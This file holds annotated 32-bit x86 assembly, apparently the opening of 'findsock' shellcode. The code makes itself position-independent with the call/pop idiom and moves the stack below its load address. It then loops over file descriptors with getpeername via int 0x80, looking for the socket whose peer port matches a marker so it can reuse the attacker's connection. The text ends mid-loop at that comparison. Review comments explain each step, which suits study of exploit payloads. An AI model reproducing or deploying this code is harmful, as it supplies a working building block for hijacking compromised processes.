example.s
// normalizeespandebp: give the code a known stack and frame pointer derived
// from its own runtime address (32-bit x86, AT&T operand order).
// On exit: ebx = runtime address of geteip, esp = ebp = ebx - 0x1000.
// Overwrites ebx, esp and ebp; the stack the code was entered with is abandoned.
// NOTE(review): relies on the 0x1000 bytes below the code being mapped and
// writable; nothing here checks that.
normalizeespandebp:
// move esp down 0x50 bytes before the call below pushes its return address
// NOTE(review): presumably keeps that push away from bytes near the incoming esp; confirm
sub $0x50 , %esp
// call/pop idiom: the call pushes the address of geteip, the pop reads it back,
// so the code learns where it is loaded without any fixed address
call geteip
geteip:
pop %ebx
//ebx now holds the runtime address of geteip (our base)
movl %ebx,%esp
subl $0x1000,%esp
//esp now sits 0x1000 bytes below the code's own address
mov %esp,%ebp
//ebp equals esp, so the locals below are addressed relative to ebp
donenormalize:
// mainentrypoint: set up the locals and registers that findsockloop uses.
//   edi = ebp-0x2c : address of j (initialised to 0x10)
//   esi = ebp-0x28 : address of the addr buffer
//   ebx = 0x300    : i, pushed by the loop as the first argument
mainentrypoint:
//edi = &j (0xffffffd4 is -0x2c as a signed 32-bit displacement)
lea 0xffffffd4(%ebp),%edi
//reserve 0x2c bytes below ebp for the locals
sub $0x2c,%esp
//i=256*3 (0x300)
mov $0x300,%ebx
//j=0x10, stored at ebp-0x2c
// NOTE(review): 0x10 looks like the address-buffer length that getpeername takes by pointer; confirm
movl $0x10,0xffffffd4(%ebp)
//esi = &addr (ebp-0x28)
lea 0xffffffd8(%ebp),%esi
//loads esi with its own value, so register state is unchanged
lea 0x0(%esi),%esi
findsockloop:
//&j
push %edi
//&addr
push %esi
//i
push %ebx
//call get peername
xchg %ebx,%edx
mov $0x66,%eax
mov $0x7,%ebx
lea 0x0(%esp,1),%ecx
int $0x80
xchg %ebx,%edx
add $0x10,%esp
cmp $0,%eax
jne continueloop
//if we got here, we did got 0 (success) as the result of getpeername()
cmpw $0x5321,0xffffffda(%ebp)